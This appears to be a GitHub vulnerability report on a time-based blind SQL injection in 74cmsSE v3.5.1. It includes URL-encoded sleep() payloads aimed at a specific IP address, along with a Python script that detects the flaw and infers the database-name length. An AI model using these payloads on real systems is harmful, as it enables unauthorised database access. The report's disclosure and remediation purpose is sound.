SQL Injection vulnerability #9

Open
PAINCLOWN opened this issue Jun 9, 2022 · 0 comments
Exploit Title: SQL Injection vulnerability in 74cmsSE_v3.5.1
Date of Discovery: 21/4/2022
Product version: 74cmsSE_v3.5.1
Download link: http://www.74cms.com/downloadse/show/id/68.html
Vulnerability Description:
74cmsSE_v3.5.1 has a time-based blind SQL injection that allows an attacker to run malicious SQL statements on the database, which can be exploited to execute illegal SQL commands and obtain sensitive database data.

POC:
Payload:
/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=

In the path:
/v1_0/home/resume/index
the $keyword parameter is not strictly filtered, resulting in SQL injection.
exp1:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=

[figure: response timing for exp1]

As you can see from the figure above, the sleep() function is executed, so there is a time-based blind SQL injection.
With the payload test above it is possible that the sleep() function is being executed twice.
The time-based blind injection makes it possible to guess the length of database():
exp2:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=

[figure: response timing for exp2]

As shown in the following figure, we know through the arbitrary file read vulnerability that the database name of the website is "qscms2", and the delay is exactly double the length of database(), so the injection is successful.
[figure: file read result showing the database name "qscms2"]

It's a time-based SQL injection.
Suggestion: add a filter function to this parameter.
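The timing check behind exp1 and exp2, as an added example that is not part of this issue or of 74cmsSE's own code. It reuses the reporter's payload shape and the /v1_0/home/resume/index path; the TARGET host in BASE_URL, the parameter subset sent, the tolerance values and the simulated_fetch stand-in (which models the issue's observation that sleep() ran twice per request, with a constructed "qscms2" database name) are all assumptions made here so the script runs offline. detect_time_blind() only reports a finding when the response delay scales with the requested sleep() argument, which rules out a merely slow server, and it returns the multiplier that infer_database_length() then divides out, matching the "exactly double" observation in the report.

```python
import re
import statistics
import time
import urllib.parse
import urllib.request

# Endpoint from the issue. TARGET is a placeholder to fill in for a live run
# against an instance you are authorised to test.
BASE_URL = "http://TARGET:8766/v1_0/home/resume/index"


def build_payload(inner_sql: str) -> str:
    """Wrap a MySQL expression the way the issue's PoC does: close the quoted
    keyword with ', splice the expression in with +, and reopen the quote.
    The surrounding /* */ is kept exactly as in exp1/exp2."""
    return f"/*'+({inner_sql})+'*/"


def sleep_probe(seconds) -> str:
    """The exp1 payload with a configurable sleep() argument."""
    return build_payload(f"select if(now()=sysdate(),sleep({seconds}),0)")


# exp2: the delay becomes the length of the current database name
DB_LENGTH_PROBE = build_payload(
    "select if(now()=sysdate(),sleep(length(database())),0)")


def build_url(keyword: str) -> str:
    """Assumption: only the parameters that matter are sent; the rest were
    empty in the PoC URL."""
    query = {"__r": "1", "keyword": keyword, "page": "1", "pagesize": "10"}
    return BASE_URL + "?" + urllib.parse.urlencode(query)


def live_fetch(keyword: str, timeout: float = 60) -> float:
    """Seconds until the server answers; errors still count as elapsed time."""
    start = time.monotonic()
    try:
        urllib.request.urlopen(build_url(keyword), timeout=timeout).read()
    except Exception:
        pass
    return time.monotonic() - start


def simulated_fetch(keyword: str, db_name: str = "qscms2",
                    query_runs: int = 2, base_latency: float = 0.12) -> float:
    """Constructed stand-in for the server so the script runs offline.
    It mimics the issue's observation that the keyword lands in a query that
    is executed twice (query_runs=2), so sleep(n) costs about 2n seconds."""
    match = re.search(r"sleep\((.*)\),0\)", keyword)
    if not match:
        return base_latency
    arg = match.group(1)
    seconds = len(db_name) if arg == "length(database())" else float(arg)
    return base_latency + query_runs * seconds


def _median_time(fetch, keyword, samples):
    return statistics.median(fetch(keyword) for _ in range(samples))


def detect_time_blind(fetch, delays=(2, 4), samples=3, tolerance=0.5):
    """Return (injectable, multiplier). The extra delay must track the
    requested sleep() for every probe; otherwise a slow server would look
    like a finding. multiplier is how many times sleep() ran per request."""
    baseline = _median_time(fetch, sleep_probe(0), samples)
    ratios = []
    for delay in delays:
        extra = _median_time(fetch, sleep_probe(delay), samples) - baseline
        if extra < delay - tolerance:
            return False, 0
        ratios.append(extra / delay)
    return True, round(statistics.mean(ratios))


def infer_database_length(fetch, multiplier, samples=3):
    """exp2: the extra delay divided by the multiplier is length(database())."""
    baseline = _median_time(fetch, sleep_probe(0), samples)
    extra = _median_time(fetch, DB_LENGTH_PROBE, samples) - baseline
    return round(extra / multiplier)


if __name__ == "__main__":
    fetch = simulated_fetch  # swap in live_fetch for a real (authorised) target
    found, mult = detect_time_blind(fetch)
    print("time-based blind injection:", found, "| sleep() ran", mult, "times")
    if found:
        print("length(database()) =", infer_database_length(fetch, mult))
```

The reason the payload works is that the keyword is concatenated into a quoted string literal; binding it as a prepared-statement parameter instead of filtering characters removes the injection regardless of what the value contains.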
